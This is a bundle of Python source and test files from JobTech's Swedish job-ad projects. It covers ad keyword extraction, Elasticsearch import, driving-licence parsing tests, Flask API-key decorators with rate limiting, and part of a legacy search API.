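assert [c["concept"] for c in concepts["occupation"]] == ["Systemutvecklare"]
assert [c["concept"] for c in concepts["skill"]] == ["Python"]
assert [c["concept"] for c in concepts["skill_must"]] == ["Java"]
assert [c["concept"] for c in concepts["skill_must_not"]] == ["Php"]
```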
#### File: tests/test_resources/settings.py
```python
import datetime
import os
import json
# environment variables must be set
# env values are strings, so parse truthiness explicitly (otherwise 'False' would be truthy)
TEST_USE_STATIC_DATA = str(os.getenv('TEST_USE_STATIC_DATA', True)).lower() in ('true', '1')
test_api_key_search = os.getenv('TEST_API_KEY_SEARCH')
test_api_key_stream = os.getenv('TEST_API_KEY_STREAM')
NUMBER_OF_ADS = 1495
DAWN_OF_TIME = '1971-01-01T00:00:01'
current_time_stamp = datetime.datetime.now().strftime("%Y-%m-%dT%H:%M:%S")
headers_search = {'api-key': test_api_key_search, 'accept': 'application/json'}
headers_stream = {'api-key': test_api_key_stream, 'accept': 'application/json'}
test_url_search = os.getenv('TEST_URL_SEARCH', 'http://localhost')
test_port_search = os.getenv('TEST_PORT_SEARCH', 5000)
test_url_stream = os.getenv('TEST_URL_STREAM', 'http://localhost')
test_port_stream = os.getenv('TEST_PORT_STREAM', 5000)
SEARCH_URL = f"{test_url_search}:{test_port_search}"
STREAM_URL = f"{test_url_stream}:{test_port_stream}"
REMOTE_MATCH_PHRASES = [y.lower() for y in ["Arbeta på distans", "Arbete på distans", "Jobba på distans", "Arbeta hemifrån",
"Arbetar hemifrån", "Jobba hemifrån", "Jobb hemifrån", "remote work", "jobba tryggt hemifrån"]]
REMOTE_PHRASES_FOR_SWAGGER = json.dumps(REMOTE_MATCH_PHRASES, ensure_ascii=False)
def format_remote_phrases_for_swagger():
swagger_str = ''
for p in REMOTE_MATCH_PHRASES:
swagger_str += f'"{p}", '
return swagger_str.rstrip(', ')
``` |
{
"source": "JobtechSwe/elastic-importers",
"score": 3
} |
#### File: importers/common/keywords_extracted.py
```python
import logging
import re
log = logging.getLogger(__name__)
def add_keywords_extracted(annons):
if 'keywords' not in annons:
annons['keywords'] = {'extracted': {}}
for key_dict in [
{
'occupation': [
'occupation.label',
'occupation_group.label',
'occupation_field.label',
]
},
{
'skill': [
'must_have.skills.label',
'must_have.languages.label',
'nice_to_have.skills.label',
'nice_to_have.languages.label',
]
},
{
'location': [
'workplace_address.city',
'workplace_address.municipality',
'workplace_address.region',
'workplace_address.country',
]
},
{
'employer': [
'employer.name',
'employer.workplace'
]
}
]:
field = list(key_dict.keys())[0]
keywords = set()
values = []
for key in list(key_dict.values())[0]:
values += _get_nested_value(key, annons)
if field == 'employer':
for value in _create_employer_name_keywords(values):
keywords.add(value)
elif field == 'location':
for value in values:
trimmed = _trim_location(value)
if trimmed:
keywords.add(trimmed)
else:
for value in values:
for kw in _extract_taxonomy_label(value):
keywords.add(kw)
annons['keywords']['extracted'][field] = list(keywords)
return annons
def _create_employer_name_keywords(companynames):
names = []
for companyname in companynames or []:
converted_name = companyname.lower().strip()
converted_name = __right_replace(converted_name, ' ab', '')
converted_name = __left_replace(converted_name, 'ab ', '')
names.append(converted_name)
if names:
names.sort(key=lambda s: len(s))
shortest = len(names[0])
uniques = [names[0]]
for i in range(1, len(names)):
if names[i][0:shortest] != names[0] and names[i]:
uniques.append(names[i])
return uniques
return []
def __right_replace(astring, pattern, sub):
return sub.join(astring.rsplit(pattern, 1))
def __left_replace(astring, pattern, sub):
return sub.join(astring.split(pattern, 1))
def _trim_location(locationstring):
# Look for unwanted words (see tests/unit/test_converter.py)
pattern = '[0-9\\-]+|.+,|([\\d\\w]+\\-[\\d]+)|\\(.*|.*\\)|\\(\\)|\\w*\\d+\\w*'
regex = re.compile(pattern)
stopwords = ['box']
if locationstring:
# Magic regex
valid_words = []
for word in locationstring.lower().split():
if word and not re.match(regex, word) and word not in stopwords:
valid_words.append(word)
return ' '.join(valid_words)
return locationstring
def _get_nested_value(path, data):
key_path = path.split('.')
values = []
for i in range(len(key_path)):
element = data.get(key_path[i])
if isinstance(element, str):
values.append(element)
break
if isinstance(element, list):
for item in element:
if item:
values.append(item.get(key_path[i + 1]))
break
if isinstance(element, dict):
data = element
return values
def _extract_taxonomy_label(label):
if not label:
return []
try:
label = label.replace('m.fl.', '').strip()
if '-' in label:
return [word.lower() for word in re.split(r'/', label)]
else:
return [word.lower().strip() for word in re.split(r'/|, | och ', label)]
except AttributeError:
log.warning(f'(extract_taxonomy_label) extract fail for: {label}')
return []
```
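To make the extraction flow concrete, here is a hedged sketch that runs a minimal, made-up ad through `add_keywords_extracted`; the input values are invented and the import path follows the file header above:
```python
# Illustrative only: a hypothetical minimal ad run through the extraction above.
from importers.common.keywords_extracted import add_keywords_extracted

ad = {
    'occupation': {'label': 'Systemutvecklare/Programmerare'},
    'employer': {'name': 'Exempelbolaget AB', 'workplace': 'Exempelbolaget'},
    'workplace_address': {'city': 'Stockholm', 'municipality': 'Stockholm'},
}
extracted = add_keywords_extracted(ad)['keywords']['extracted']
# -> {'occupation': ['systemutvecklare', 'programmerare'], 'skill': [],
#     'location': ['stockholm'], 'employer': ['exempelbolaget']}  (list order may vary)
print(extracted)
```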
#### File: importers/platsannons/main.py
```python
import time
import logging
import sys
import math
from datetime import datetime
from jobtech.common.customlogging import configure_logging
import importers.mappings
from importers import settings
from importers.platsannons import loader, converter
from importers.common import elastic, enricher
from importers.indexmaint.main import set_platsannons_read_alias, set_platsannons_write_alias, \
check_index_size_before_switching_alias
from importers.common.helpers import grouper
configure_logging([__name__.split('.')[0], 'importers'])
log = logging.getLogger(__name__)
enriched_ads_to_save = []
def _setup_index(es_index):
if len(sys.argv) > 1:
es_index = sys.argv[1]
try:
es_index, delete_index = elastic.setup_indices(es_index,
settings.ES_ANNONS_PREFIX,
importers.mappings.platsannons_mappings,
importers.mappings.platsannons_deleted_mappings)
log.info(f'Starting importer with batch: {settings.PG_BATCH_SIZE} for index: {es_index}')
log.info(f'Index for removed items: {delete_index}')
except Exception as e:
log.error(f"Elastic operations failed. Exit! {e}")
sys.exit(1)
return es_index, delete_index
def _check_last_timestamp(es_index):
if not settings.LA_LAST_TIMESTAMP_MANUAL:
last_timestamp = elastic.get_last_timestamp(es_index)
log.info("Index: %s Last timestamp: %d (%s)"
% (es_index, last_timestamp, datetime.fromtimestamp(last_timestamp / 1000)))
else:
last_timestamp = settings.LA_LAST_TIMESTAMP
log.warning("Index: %s Last timestamp set MANUALLY: %d (%s)"
% (es_index, last_timestamp, datetime.fromtimestamp(last_timestamp / 1000)))
return last_timestamp
def start(es_index=None):
start_time = time.time()
if not elastic.get_alias(importers.settings.ES_TAX_INDEX_ALIAS):
log.error(f"no index for: {importers.settings.ES_TAX_INDEX_ALIAS}. Exit!")
sys.exit(1)
if not settings.LA_FEED_URL:
log.error("LA_FEED_URL is not set. Exit!")
sys.exit(1)
# Get, set and create elastic index
es_index, es_index_deleted = _setup_index(es_index)
log.info(f"Starting ad import into index: {es_index}")
log.info(f"Using taxonomy index: {elastic.get_index_name_for_alias(importers.settings.ES_TAX_INDEX_ALIAS)}")
last_timestamp = _check_last_timestamp(es_index)
log.info(f"Timestamp to load from: {last_timestamp}")
# Load list of updated ad ids
ad_ids = loader.load_list_of_updated_ads(last_timestamp)
number_total = len(ad_ids)
number_of_ids_to_load = number_total
    # guard against an endless loop when the same set of ads keeps failing to load:
number_of_ids_missing_fix = -1
while number_of_ids_to_load > 0:
log.info(f'Fetching details for ads: {number_of_ids_to_load}')
_load_and_process_ads(ad_ids, es_index, es_index_deleted)
log.info(f"Verifying that all ads were indexed in: {es_index}")
ad_ids = _find_missing_ids_and_create_loadinglist(ad_ids, es_index)
number_of_ids_to_load = len(ad_ids)
if number_of_ids_missing_fix == number_of_ids_to_load:
log.error(f"Missing ads amount is same as before: {number_of_ids_to_load}")
log.error(f"No more trying to fetch. Check these ads: {ad_ids}")
break
if number_of_ids_to_load > 0:
number_of_ids_missing_fix = number_of_ids_to_load
log.info(f"Missing ads: {ad_ids}")
log.warning(f"Still missing ads: {number_of_ids_to_load}. Trying again...")
else:
log.info("No missing ads to load.")
break
elapsed_time = time.time() - start_time
m, s = divmod(elapsed_time, 60)
log.info("Processed %d docs in: %d minutes %5.2f seconds." % (number_total, m, s))
num_doc_elastic = elastic.document_count(es_index)
if num_doc_elastic:
log.info(f"Index: {es_index} has: {num_doc_elastic} indexed documents.")
if not check_index_size_before_switching_alias(es_index):
log.error(f"Index: {es_index} has: {num_doc_elastic} indexed documents. Exit!")
sys.exit(1)
def _load_and_process_ads(ad_ids, es_index, es_index_deleted):
doc_counter = 0
len_ads = len(ad_ids)
nr_of_items_per_batch = settings.PG_BATCH_SIZE
nr_of_items_per_batch = min(nr_of_items_per_batch, len_ads)
if nr_of_items_per_batch < 1:
log.error("Failed to retrieve any ads. Exit!")
sys.exit(1)
nr_of_batches = math.ceil(len_ads / nr_of_items_per_batch)
# Partition list into manageable chunks
ad_batches = grouper(nr_of_items_per_batch, ad_ids)
processed_ads_total = 0
for i, ad_batch in enumerate(ad_batches):
log.info('Processing batch %s/%s' % (i + 1, nr_of_batches))
# Fetch ads from LA to raw-list
ad_details = loader.bulk_fetch_ad_details(ad_batch)
raw_ads = [raw_ad for raw_ad in list(ad_details.values())
if not raw_ad.get('removed', False)]
doc_counter += len(raw_ads)
log.info(f'doc_counter=len(raw_ads): {doc_counter}')
log.debug(f'Fetched batch of ads (id, updatedAt): '
f'{", ".join(("(" + str(ad["annonsId"]) + ", " + str(ad["updatedAt"])) + ")" for ad in raw_ads)}')
_convert_and_save_to_elastic(ad_details.values(), es_index, es_index_deleted)
processed_ads_total = processed_ads_total + len(ad_batch)
log.info(f'Processed ads: {processed_ads_total}/{len_ads}')
return doc_counter
def _convert_and_save_to_elastic(raw_ads, es_index, deleted_index):
# Loop over raw-list, convert and enrich into cooked-list
log.info(f"Converting: {len(raw_ads)} ads to proper format ...")
converted_ads = [converter.convert_ad(raw_ad) for raw_ad in raw_ads]
log.info("Enriching ads with ML ...")
enriched_ads = enricher.enrich(converted_ads)
if settings.SAVE_ENRICHED_ADS:
global enriched_ads_to_save
enriched_ads_to_save.extend(enriched_ads)
log.info(f"Indexing: {len(enriched_ads)} enriched documents into: {es_index}")
# Bulk save cooked-list to elastic
num_indexed = elastic.bulk_index(enriched_ads, es_index, deleted_index)
return num_indexed
def _find_missing_ids_and_create_loadinglist(ad_ids, es_index):
id_lookup = {str(a['annonsId']): a for a in ad_ids if not a['avpublicerad']}
loaded_ids = [str(a['annonsId']) for a in ad_ids if not a['avpublicerad']]
missing_ids = elastic.find_missing_ad_ids(loaded_ids, es_index)
return [id_lookup[missing_id] for missing_id in missing_ids]
def start_daily_index():
new_index_name = "%s-%s" % (settings.ES_ANNONS_PREFIX, datetime.now().strftime('%Y%m%d-%H%M'))
log.info(f"Start creating new daily index: {new_index_name}")
log.info(f"Using taxonomy index: {elastic.get_index_name_for_alias(importers.settings.ES_TAX_INDEX_ALIAS)}")
start(new_index_name)
set_platsannons_read_alias(new_index_name)
set_platsannons_write_alias(new_index_name)
log.info(f"Switching alias to new index completed successfully: {new_index_name}")
if __name__ == '__main__':
configure_logging([__name__, 'importers'])
log = logging.getLogger(__name__)
start_daily_index()
```
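`grouper` is imported from `importers.common.helpers` but not shown here. A minimal sketch that satisfies the way it is called above, `grouper(batch_size, ad_ids)` yielding one batch at a time; the real implementation may differ:
```python
# Sketch only: a grouper-compatible helper under the assumed contract grouper(n, iterable).
from itertools import islice

def grouper(n, iterable):
    it = iter(iterable)
    while True:
        chunk = list(islice(it, n))
        if not chunk:
            return
        yield chunk

# list(grouper(3, range(8))) -> [[0, 1, 2], [3, 4, 5], [6, 7]]
```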
#### File: tests/integration_tests/test_drivers_license.py
```python
import pytest
from importers.platsannons import converter
drivers_licenses_test_data = [
{'input': {'korkort': [{'namn': 'B', 'varde': 'VTK8_WRx_GcM'}]},
'expected': [{'concept_id': 'VTK8_WRx_GcM', 'legacy_ams_taxonomy_id': '3', 'label': 'B'}]},
{'input': {'korkort': [{'namn': 'B', 'varde': 'VTK8_WRx_GcM'}, {'namn': 'C1', 'varde': 'swP6_psb_FCB'}]},
'expected': [{'concept_id': 'VTK8_WRx_GcM', 'legacy_ams_taxonomy_id': '3', 'label': 'B'},
{'concept_id': 'swP6_psb_FCB', 'legacy_ams_taxonomy_id': '12', 'label': 'C1'}]},
{'input': {'korkort': [{'namn': 'B', 'varde': 'VTK8_WRx_GcM'}, {'namn': 'D', 'varde': 'hK1a_wsQ_4UG'}]},
'expected': [{'concept_id': 'VTK8_WRx_GcM', 'legacy_ams_taxonomy_id': '3', 'label': 'B'},
{'concept_id': 'hK1a_wsQ_4UG', 'legacy_ams_taxonomy_id': '5', 'label': 'D'}]},
{'input': {'korkort': [{'namn': 'AM', 'varde': '4HpY_e2U_TUH'}]},
'expected': [{'concept_id': '4HpY_e2U_TUH', 'legacy_ams_taxonomy_id': '16', 'label': 'AM'}]},
{'input': {'korkort': [{'namn': 'B', 'varde': 'VTK8_WRx_GcM'}, {'namn': '<NAME>', 'varde': 'ftCQ_gFu_L4b'},
{'namn': 'BE', 'varde': 'bcFd_Vkt_KXL'}, {'namn': 'C1', 'varde': 'swP6_psb_FCB'},
{'namn': 'C', 'varde': 'BKCx_hST_Pcm'}]},
'expected': [{'concept_id': 'VTK8_WRx_GcM', 'legacy_ams_taxonomy_id': '3', 'label': 'B'},
{'concept_id': 'ftCQ_gFu_L4b', 'legacy_ams_taxonomy_id': '18', 'label': 'Utökad B'},
{'concept_id': 'bcFd_Vkt_KXL', 'legacy_ams_taxonomy_id': '6', 'label': 'BE'},
{'concept_id': 'swP6_psb_FCB', 'legacy_ams_taxonomy_id': '12', 'label': 'C1'},
{'concept_id': 'BKCx_hST_Pcm', 'legacy_ams_taxonomy_id': '4', 'label': 'C'}]},
{'input': {'korkort': [{'namn': 'BE', 'varde': 'bcFd_Vkt_KXL'}, {'namn': 'CE', 'varde': 'zZu8_iZ9_wMH'}]},
'expected': [{'concept_id': 'bcFd_Vkt_KXL', 'legacy_ams_taxonomy_id': '6', 'label': 'BE'},
{'concept_id': 'zZu8_iZ9_wMH', 'legacy_ams_taxonomy_id': '7', 'label': 'CE'}]},
{'input': {'korkort': [{'namn': 'B', 'varde': 'VTK8_WRx_GcM'}, {'namn': 'C', 'varde': 'BKCx_hST_Pcm'},
{'namn': 'CE', 'varde': 'zZu8_iZ9_wMH'}]},
'expected': [{'concept_id': 'VTK8_WRx_GcM', 'legacy_ams_taxonomy_id': '3', 'label': 'B'},
{'concept_id': 'BKCx_hST_Pcm', 'legacy_ams_taxonomy_id': '4', 'label': 'C'},
{'concept_id': 'zZu8_iZ9_wMH', 'legacy_ams_taxonomy_id': '7', 'label': 'CE'}]},
{'input': {'korkort': [{'namn': 'B', 'varde': 'VTK8_WRx_GcM'}, {'namn': 'C', 'varde': 'BKCx_hST_Pcm'}]},
'expected': [{'concept_id': 'VTK8_WRx_GcM', 'legacy_ams_taxonomy_id': '3', 'label': 'B'},
{'concept_id': 'BKCx_hST_Pcm', 'legacy_ams_taxonomy_id': '4', 'label': 'C'}]},
{'input': {'korkort': [{'namn': 'B', 'varde': 'VTK8_WRx_GcM'}, {'namn': 'AM', 'varde': '4HpY_e2U_TUH'}]},
'expected': [{'concept_id': 'VTK8_WRx_GcM', 'legacy_ams_taxonomy_id': '3', 'label': 'B'},
{'concept_id': '4HpY_e2U_TUH', 'legacy_ams_taxonomy_id': '16', 'label': 'AM'}]},
{'input': {'korkort': [{'namn': 'CE', 'varde': 'zZu8_iZ9_wMH'}]},
'expected': [{'concept_id': 'zZu8_iZ9_wMH', 'legacy_ams_taxonomy_id': '7', 'label': 'CE'}]},
{'input': {'korkort': [{'namn': 'BE', 'varde': 'bcFd_Vkt_KXL'}, {'namn': 'B', 'varde': 'VTK8_WRx_GcM'}]},
'expected': [{'concept_id': 'bcFd_Vkt_KXL', 'legacy_ams_taxonomy_id': '6', 'label': 'BE'},
{'concept_id': 'VTK8_WRx_GcM', 'legacy_ams_taxonomy_id': '3', 'label': 'B'}]},
{'input': {'korkort': [{'namn': 'C', 'varde': 'BKCx_hST_Pcm'}]},
'expected': [{'concept_id': 'BKCx_hST_Pcm', 'legacy_ams_taxonomy_id': '4', 'label': 'C'}]},
{'input': {'korkort': [{'namn': 'C1', 'varde': 'swP6_psb_FCB'}]},
'expected': [{'concept_id': 'swP6_psb_FCB', 'legacy_ams_taxonomy_id': '12', 'label': 'C1'}]},
{'input': {'korkort': [{'namn': 'C', 'varde': 'BKCx_hST_Pcm'}, {'namn': 'B', 'varde': 'VTK8_WRx_GcM'}]},
'expected': [{'concept_id': 'BKCx_hST_Pcm', 'legacy_ams_taxonomy_id': '4', 'label': 'C'},
{'concept_id': 'VTK8_WRx_GcM', 'legacy_ams_taxonomy_id': '3', 'label': 'B'}]},
{'input': {'korkort': [{'namn': 'B', 'varde': 'VTK8_WRx_GcM'}, {'namn': 'CE', 'varde': 'zZu8_iZ9_wMH'},
{'namn': 'C', 'varde': 'BKCx_hST_Pcm'}]},
'expected': [{'concept_id': 'VTK8_WRx_GcM', 'legacy_ams_taxonomy_id': '3', 'label': 'B'},
{'concept_id': 'zZu8_iZ9_wMH', 'legacy_ams_taxonomy_id': '7', 'label': 'CE'},
{'concept_id': 'BKCx_hST_Pcm', 'legacy_ams_taxonomy_id': '4', 'label': 'C'}]},
{'input': {'korkort': [{'namn': '<NAME>', 'varde': 'ftCQ_gFu_L4b'}]},
'expected': [{'concept_id': 'ftCQ_gFu_L4b', 'legacy_ams_taxonomy_id': '18', 'label': 'Utökad B'}]},
{'input': {'korkort': [{'namn': 'B', 'varde': 'VTK8_WRx_GcM'}, {'namn': 'BE', 'varde': 'bcFd_Vkt_KXL'}]},
'expected': [{'concept_id': 'VTK8_WRx_GcM', 'legacy_ams_taxonomy_id': '3', 'label': 'B'},
{'concept_id': 'bcFd_Vkt_KXL', 'legacy_ams_taxonomy_id': '6', 'label': 'BE'}]},
{'input': {'korkort': [{'namn': 'C', 'varde': 'BKCx_hST_Pcm'}, {'namn': 'CE', 'varde': 'zZu8_iZ9_wMH'}]},
'expected': [{'concept_id': 'BKCx_hST_Pcm', 'legacy_ams_taxonomy_id': '4', 'label': 'C'},
{'concept_id': 'zZu8_iZ9_wMH', 'legacy_ams_taxonomy_id': '7', 'label': 'CE'}]},
{'input': {'korkort': [{'namn': 'A', 'varde': 'hK8X_cX9_5P4'}]},
'expected': [{'concept_id': 'hK8X_cX9_5P4', 'legacy_ams_taxonomy_id': '10', 'label': 'A'}]},
{'input': {'korkort': [{'namn': 'BE', 'varde': 'bcFd_Vkt_KXL'}]},
'expected': [{'concept_id': 'bcFd_Vkt_KXL', 'legacy_ams_taxonomy_id': '6', 'label': 'BE'}]},
{'input': {'korkort': [{'namn': 'B', 'varde': 'VTK8_WRx_GcM'}, {'namn': '<NAME>', 'varde': 'ftCQ_gFu_L4b'},
{'namn': 'C1', 'varde': 'swP6_psb_FCB'}, {'namn': 'C', 'varde': 'BKCx_hST_Pcm'}]},
'expected': [{'concept_id': 'VTK8_WRx_GcM', 'legacy_ams_taxonomy_id': '3', 'label': 'B'},
{'concept_id': 'ftCQ_gFu_L4b', 'legacy_ams_taxonomy_id': '18', 'label': 'Utökad B'},
{'concept_id': 'swP6_psb_FCB', 'legacy_ams_taxonomy_id': '12', 'label': 'C1'},
{'concept_id': 'BKCx_hST_Pcm', 'legacy_ams_taxonomy_id': '4', 'label': 'C'}]},
]
@pytest.mark.parametrize("test_case", drivers_licenses_test_data)
def test_drivers_license(test_case):
converted = converter.parse_driving_licence(test_case['input'])
assert converted == test_case['expected']
```
#### File: integration_tests/test_resources/original_value.py
```python
def get_original_value(my_list):
for item in my_list:
if item['original_value']:
return item
return False
```
#### File: tests/utils/unspecified_city_and_remote.py
```python
import datetime
import pathlib
import glob
import json
files_with_path = pathlib.Path.cwd() / "*historical*.json"
def open_file(file_name):
with open(file_name, 'r') as f:
list_of_ads_from_file = json.load(f)
return list_of_ads_from_file
def file_list(pattern):
json_files = glob.glob(str(pattern))
json_files.sort()
return json_files
def current_year():
return datetime.datetime.now().year
def year_from_file(file):
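    # NOTE (assumption): file names are expected to end in "<YYYY>xx.json", i.e. two
    # characters between the year and ".json", e.g. "...historical-2017-1.json" -> "2017".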
year = file[-11:-7]
return year
def start():
json_files = file_list(files_with_path)
all_results = []
for y in range(2006, current_year()):
# select files from for year y
files_for_this_year = []
for f in json_files:
file_year = year_from_file(f)
if str(y) == file_year:
files_for_this_year.append(f)
total_no_city = 0
total_has_city = 0
total_remote = 0
total = 0
for file in files_for_this_year:
list_of_ads_from_file = open_file(file)
no_city_tmp = 0
has_city_tmp = 0
remote_tmp = 0
total_tmp = 0
for ad in list_of_ads_from_file:
if ad.get('workplace_address', {}).get('city') or ad.get('workplace_address', {}).get('municipality'):
has_city_tmp += 1
else:
no_city_tmp += 1
if ad.get('remote_work', None):
remote_tmp += 1
total_tmp = len(list_of_ads_from_file)
total_no_city += no_city_tmp
total_has_city += has_city_tmp
total_remote += remote_tmp
total += total_tmp
year_result = f"{y}, {total} , {total_no_city}, {total_has_city}, {total_remote}"
all_results.append(year_result)
with open(f"results.csv", mode="w") as f:
header = f"year, total, no city, city, remote "
f.write(f"{header}\n")
for r in all_results:
f.write(f"{r}\n")
if __name__ == '__main__':
"""
Input:
json files converted by the convert-historical function in elastic-importers
These files are expected to be in the same directory as this program, and follow this naming convention: "*historical*.json"
The output of this program is a .csv file with the results grouped per year
"""
start()
``` |
{
"source": "JobtechSwe/jobtech-common",
"score": 2
} |
#### File: common/rest/decorators.py
```python
import logging
import base64
import binascii
import re
import json
from flask import request
from flask_restx import abort
from pymemcache.client import base
from jobtech.common import settings
from jobtech.common.repository import elastic
log = logging.getLogger(__name__)
EMAIL_REGEX = re.compile(r"\"?([-a-zA-Z0-9.`?{}]+@\w+\.\w+)\"?")
def json_serializer(key, value):
if type(value) == str:
return value, 1
return json.dumps(value), 2
def json_deserializer(key, value, flags):
if flags == 0:
return None
if flags == 1:
return value.decode('utf-8')
if flags == 2:
return json.loads(value.decode('utf-8'))
raise Exception("Unknown serialization format")
memcache = base.Client(('localhost', 11211),
serializer=json_serializer,
deserializer=json_deserializer, ignore_exc=True)
def check_api_key_simple(func):
def wrapper(*args, **kwargs):
apikey = request.headers.get(settings.APIKEY)
decoded_key = _decode_key(apikey)
if EMAIL_REGEX.match(decoded_key):
log.debug("API key %s is valid." % decoded_key)
return func(*args, **kwargs)
log.info("Failed validation for key '%s'" % decoded_key)
abort(401, message="You're no monkey!")
return wrapper
def check_api_key(api_identifier, rate_limit=None):
def real_check_api_key_decorator(func):
def wrapper(*args, **kwargs):
memcache_key = "valid_api_keys_%s" % api_identifier
valid_api_dict = memcache.get(memcache_key)
if not valid_api_dict:
log.debug("Reloading API keys for api id: %s" % api_identifier)
new_keys = elastic.get_source(index=settings.ES_SYSTEM_INDEX,
id=api_identifier, ignore=404)
if new_keys:
log.debug("Updating API keys from ES: %s" % new_keys)
valid_api_dict = new_keys
try:
memcache.set(memcache_key, valid_api_dict, 60)
except ConnectionRefusedError:
log.debug(
"Memcache not available, reloading keys for " +
"each request.")
apikey = request.headers.get(settings.APIKEY)
memcache_rate_key = "rate_limit_%s_%s_%s" % \
(api_identifier, apikey, rate_limit)
if apikey in valid_api_dict:
if rate_limit and memcache.get(memcache_rate_key):
abort(429,
message='Rate limit is one request per %d seconds.'
% rate_limit)
if rate_limit:
try:
memcache.set(memcache_rate_key, True, rate_limit)
except ConnectionRefusedError:
log.debug("Memcache not available, unable to set rate limit.")
log.debug("API key: %s is valid for application: %s (ID: %s)"
% (apikey,
valid_api_dict[apikey].get('app'),
valid_api_dict[apikey].get('id')))
return func(*args, **kwargs)
log.info("Failed validation for key '%s'" % apikey)
abort(401, message="Missing or invalid API key")
return wrapper
return real_check_api_key_decorator
def check_api_key_and_return_metadata(api_identifier, rate_limit=None):
def real_check_api_key_metadata_decorator(func):
def wrapper(*args, **kwargs):
memcache_key = "valid_api_keys_%s" % api_identifier
valid_api_dict = memcache.get(memcache_key)
log.debug("Memcache key: %s" % valid_api_dict)
if not valid_api_dict:
log.debug("Reloading API keys for api id: %s" % api_identifier)
new_keys = elastic.get_source(index=settings.ES_SYSTEM_INDEX,
id=api_identifier, ignore=404)
if new_keys:
log.debug("Updating API keys from ES: %s" % new_keys)
valid_api_dict = new_keys
try:
memcache.set(memcache_key, valid_api_dict, 60)
except ConnectionRefusedError:
log.debug("Memcache not available, reloading keys for each request.")
apikey = request.headers.get(settings.APIKEY)
memcache_rate_key = "rate_limit_%s_%s_%s" % \
(api_identifier, apikey, rate_limit)
if apikey in valid_api_dict:
if rate_limit and memcache.get(memcache_rate_key):
abort(429,
message='Rate limit is one request per %d seconds.'
% rate_limit)
if rate_limit:
try:
memcache.set(memcache_rate_key, True, rate_limit)
except ConnectionRefusedError:
log.debug("Memcache not available, unable to set rate limit.")
kwargs['key_id'] = apikey
kwargs['key_app'] = valid_api_dict[apikey].get('app')
log.debug("API key: %s is valid for application: %s (ID: %s)"
% (apikey,
valid_api_dict[apikey].get('app'),
valid_api_dict[apikey].get('id')))
return func(*args, **kwargs)
log.info("Failed validation for key '%s'" % apikey)
abort(401, message="Missing or invalid API key")
return wrapper
return real_check_api_key_metadata_decorator
# Decodes the API key, which is base64-encoded
def _decode_key(apikey):
decoded = apikey if apikey is not None else 'Invalid Key: None'
if apikey:
for i in range(3):
try:
decoded = base64.urlsafe_b64decode(apikey).decode('utf-8').strip()
break
except binascii.Error as e:
log.debug("Failed to decode api key: %s: %s" % (apikey, e))
pass
except UnicodeDecodeError as u:
log.debug("Failed to decode utf-8 key: %s: %s" % (apikey, u))
                decoded = 'Invalid Key'  # Prevents users from sending a plain email address
# Reappend trailing '=' to find correct padding
apikey = "%s=" % apikey
return decoded
```
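For clarity, the key format `check_api_key_simple` expects is a urlsafe-base64-encoded e-mail address. A hedged round-trip sketch (the address is made up; the module path follows the test file below):
```python
# Illustrative only: build a key in the expected format and decode it again.
import base64
from jobtech.common.rest.decorators import _decode_key

raw = "someone@example.com"  # hypothetical address
apikey = base64.urlsafe_b64encode(raw.encode("utf-8")).decode("ascii")
assert _decode_key(apikey) == raw
```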
#### File: tests/unit_tests/test_api_key.py
```python
import os
import pytest
import base64
from flask import Flask
from werkzeug.exceptions import Unauthorized
from werkzeug.datastructures import Headers
import sys
from jobtech.common import settings
from jobtech.common.rest.decorators import check_api_key_simple
app = Flask('mytestapplication')
@pytest.mark.unit
def test_check_api_key_no_key():
print('==================', sys._getframe().f_code.co_name, '===================== ')
with app.test_request_context():
@check_api_key_simple
def function_to_test():
print('This line should never be printed since user has no valid API key')
with pytest.raises(Unauthorized):
function_to_test()
@pytest.mark.unit
def test_check_api_key_valid():
print('==================', sys._getframe().f_code.co_name, '===================== ')
encoded_key = base64.b64encode('<EMAIL>'.encode("utf-8"))
d = Headers()
d.add(settings.APIKEY, encoded_key)
with app.test_request_context(headers=d):
@check_api_key_simple
def valid_key_function_to_test():
print('This line should be printed since user has a valid API key')
return True
assert valid_key_function_to_test() is True
@pytest.mark.unit
def test_check_api_key_not_valid():
print('==================', sys._getframe().f_code.co_name, '===================== ')
encoded_key = base64.b64encode('not_a_valid_email_address'.encode("utf-8"))
d = Headers()
d.add(settings.APIKEY, encoded_key)
with app.test_request_context(headers=d):
@check_api_key_simple
def non_valid_key_function_to_test():
            print('This line should not be printed since user does not have a '
'valid API key')
with pytest.raises(Unauthorized):
non_valid_key_function_to_test()
@pytest.mark.unit
def test_check_api_key_not_valid_and_base64():
print('==================', sys._getframe().f_code.co_name, '===================== ')
d = Headers()
d.add(settings.APIKEY, '<EMAIL>')
with app.test_request_context(headers=d):
@check_api_key_simple
def non_base64_key_function_to_test():
            print('This line should not be printed since user does not have a '
'base64-encoded API key')
with pytest.raises(Unauthorized):
non_base64_key_function_to_test()
if __name__ == '__main__':
pytest.main([os.path.realpath(__file__), '-svv', '-ra', '-m unit'])
``` |
{
"source": "JobtechSwe/legacy-api-af",
"score": 2
} |
#### File: legacy/rest/endpoints.py
```python
import logging
from flask import request
from flask_restplus import Resource, abort
from legacy.rest import (ns_legacy, kommunlista_query, yrkesgrupp_query, yrkes_query,
legacy_query)
from legacy import repository
from legacy.rest import model
log = logging.getLogger(__name__)
@ns_legacy.route('soklista/lan')
class SoklistaLan(Resource):
def get(self):
return repository.lista_lan()
@ns_legacy.route('soklista/lan2')
class SoklistaLan2(Resource):
def get(self):
return repository.lista_lan2()
@ns_legacy.route('soklista/kommuner')
class SoklistaKommuner(Resource):
@ns_legacy.expect(kommunlista_query)
def get(self):
args = kommunlista_query.parse_args()
return repository.lista_kommuner(args['lanid'])
@ns_legacy.route('soklista/yrkesomraden')
class SoklistaYrkesomraden(Resource):
def get(self):
return repository.lista_yrkesomraden()
@ns_legacy.route('soklista/yrkesgrupper')
class SoklistaYrkesgrupper(Resource):
@ns_legacy.expect(yrkesgrupp_query)
def get(self):
args = yrkesgrupp_query.parse_args()
return repository.lista_yrkesgrupper(args['yrkesomradeid'])
@ns_legacy.route('soklista/yrken')
class SoklistaYrken(Resource):
@ns_legacy.expect(yrkes_query)
def get(self):
args = yrkes_query.parse_args()
return repository.lista_yrken(args['yrkesgruppid'])
@ns_legacy.route('soklista/yrken/<benamning>')
class SoklistaYrkenPath(Resource):
def get(self, benamning):
return repository.lista_yrken_by_string(benamning)
@ns_legacy.route('matchning')
class Matchning(Resource):
@ns_legacy.expect(legacy_query)
@ns_legacy.marshal_with(model.matchningslista)
def get(self):
args = legacy_query.parse_args()
sida = args.pop('sida')
rader = args.pop('antalrader')
if sida == 0:
sida = 1
if sida < 1:
abort(400, "Parametern sida måste vara större än noll.")
